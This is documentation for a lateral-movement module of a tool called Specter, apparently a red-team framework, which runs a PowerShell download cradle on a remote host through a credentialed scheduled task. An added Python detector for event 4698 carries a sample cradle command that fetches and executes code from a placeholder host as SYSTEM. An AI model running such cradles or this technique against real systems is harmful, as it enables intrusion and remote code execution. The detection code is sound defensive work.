Description
This script uses the Task Scheduler API together with a username and password to remotely execute a Specter PowerShell cradle.
Overview
This script uses the Task Scheduler API to register and run a scheduled task on the operator-specified system, authenticating with a username and password. The task executes a PowerShell cradle either as the specified user or as NT AUTHORITY\SYSTEM. The $Hostname parameter can be a hostname, an FQDN, or an IP address.
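From the defender's side, the behaviour described above (a task registered through the Task Scheduler API whose action launches a PowerShell cradle, optionally as SYSTEM) is visible in the Windows Security log as event 4698 ("A scheduled task was created"), whose TaskContent field carries the full task definition XML. The following is an added detection example written for this page, not Specter's code and not part of the original documentation: it parses the task XML out of constructed 4698 records and flags tasks whose Exec action is PowerShell with download-cradle indicators, escalating when the principal is S-1-5-18 (SYSTEM). The event records, SIDs, task names and the placeholder host c2.example.invalid are constructed sample data; the task schema namespace URI is the real one used by Task Scheduler.

```python
"""Added example: flag scheduled-task PowerShell cradles in Security 4698 events."""
import re
import xml.etree.ElementTree as ET
from xml.sax.saxutils import escape

# Namespace of Task Scheduler task definitions (real Microsoft schema URI).
TASK_NS = {"t": "http://schemas.microsoft.com/windows/2004/02/mit/task"}

# Argument patterns typical of a PowerShell download cradle (detection heuristics).
CRADLE_PATTERNS = [
    r"(?i)downloadstring",
    r"(?i)invoke-expression|\biex\b",
    r"(?i)net\.webclient",
    r"(?i)-enc(odedcommand)?\b",
    r"(?i)-w(indowstyle)?\s+hidden",
]

WELL_KNOWN_SIDS = {"S-1-5-18": "NT AUTHORITY\\SYSTEM"}


def task_xml(user_id, command, arguments):
    """Build a minimal task definition as it appears in the 4698 TaskContent field (constructed)."""
    return (
        f'<Task version="1.2" xmlns="{TASK_NS["t"]}">'
        f'<Principals><Principal id="Author"><UserId>{user_id}</UserId></Principal></Principals>'
        f'<Actions Context="Author"><Exec><Command>{escape(command)}</Command>'
        f"<Arguments>{escape(arguments)}</Arguments></Exec></Actions></Task>"
    )


# Constructed sample events mirroring the EventData fields of Security 4698/4702.
SAMPLE_EVENTS = [
    {"EventID": 4698, "SubjectUserName": "svc_backup", "TaskName": "\\NightlyBackup",
     "TaskContent": task_xml("S-1-5-21-1111-2222-3333-1105", "cmd.exe", "/c C:\\Scripts\\backup.bat")},
    {"EventID": 4698, "SubjectUserName": "jdoe", "TaskName": "\\CacheTask",
     "TaskContent": task_xml("S-1-5-18", "powershell.exe",
                             "-nop -w hidden -c \"IEX ((New-Object Net.WebClient)"
                             ".DownloadString('http://c2.example.invalid/stage'))\"")},
    {"EventID": 4702, "SubjectUserName": "jdoe", "TaskName": "\\CacheTask",
     "TaskContent": task_xml("S-1-5-18", "powershell.exe", "-nop -c Get-Date")},  # task updated, not created
]


def analyse_task_content(xml_text):
    """Return (principal, [(command, arguments), ...]) from a task definition XML string."""
    root = ET.fromstring(xml_text)
    user_id = root.findtext(".//t:Principals/t:Principal/t:UserId", default=None, namespaces=TASK_NS)
    actions = []
    for ex in root.findall(".//t:Actions/t:Exec", TASK_NS):
        cmd = ex.findtext("t:Command", default="", namespaces=TASK_NS)
        args = ex.findtext("t:Arguments", default="", namespaces=TASK_NS)
        actions.append((cmd, args))
    return WELL_KNOWN_SIDS.get(user_id, user_id), actions


def score_event(event):
    """Return the reasons a 4698 event looks like a PowerShell cradle task; [] if benign or not 4698."""
    if event["EventID"] != 4698:
        return []
    reasons = []
    principal, actions = analyse_task_content(event["TaskContent"])
    for cmd, args in actions:
        # Match bare or fully qualified powershell.exe / pwsh.exe commands.
        if re.search(r"(?i)(^|[\\/])(powershell|pwsh)(\.exe)?$", cmd.strip().strip('"')):
            reasons.append(f"action launches PowerShell: {cmd}")
            for pat in CRADLE_PATTERNS:
                if re.search(pat, args):
                    reasons.append(f"arguments match cradle indicator {pat!r}")
    if reasons and principal == "NT AUTHORITY\\SYSTEM":
        reasons.append("task runs as NT AUTHORITY\\SYSTEM")
    return reasons


def scan(events):
    """Return [(task_name, creator, reasons)] for every event that scored at least one reason."""
    hits = []
    for ev in events:
        reasons = score_event(ev)
        if reasons:
            hits.append((ev["TaskName"], ev["SubjectUserName"], reasons))
    return hits


if __name__ == "__main__":
    for name, creator, reasons in scan(SAMPLE_EVENTS):
        print(f"{name} created by {creator}:")
        for r in reasons:
            print("  -", r)
```

Auditing of scheduled task creation ("Audit Other Object Access Events") must be enabled for 4698 to be logged; the Microsoft-Windows-TaskScheduler/Operational log (event 106, task registered) is a fallback that records the task name and registering user but not the task XML, so the action-level checks above only work on the Security event.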
Arguments
- System: The target hostname, FQDN, or IP address.
- Username: The user to authenticate with.
- Domain: The domain the user belongs to; leave blank for a local user.
- Password: The password for the specified user account.
- Profile: Run the task as the specified user or as NT AUTHORITY\SYSTEM.
- TaskName: The name of the scheduled task.
- Build: The Specter build identifier.
Dependencies
- Lateral
Operating Systems
- Windows
Pre-Requisites
- Valid credentials for the target system.
- Task Scheduler service running on the target.
Example Output
{
    "Lateral": {
        "Username": "[email protected]",
        "Build": "8af164d0e3d5487f821b85760b4ffb51",
        "Payload": "ps_cradle",
        "Success": true,
        "Method": "Scheduled Task",
        "TaskName": "CacheTask",
        "System": "192.168.1.103"
    }
}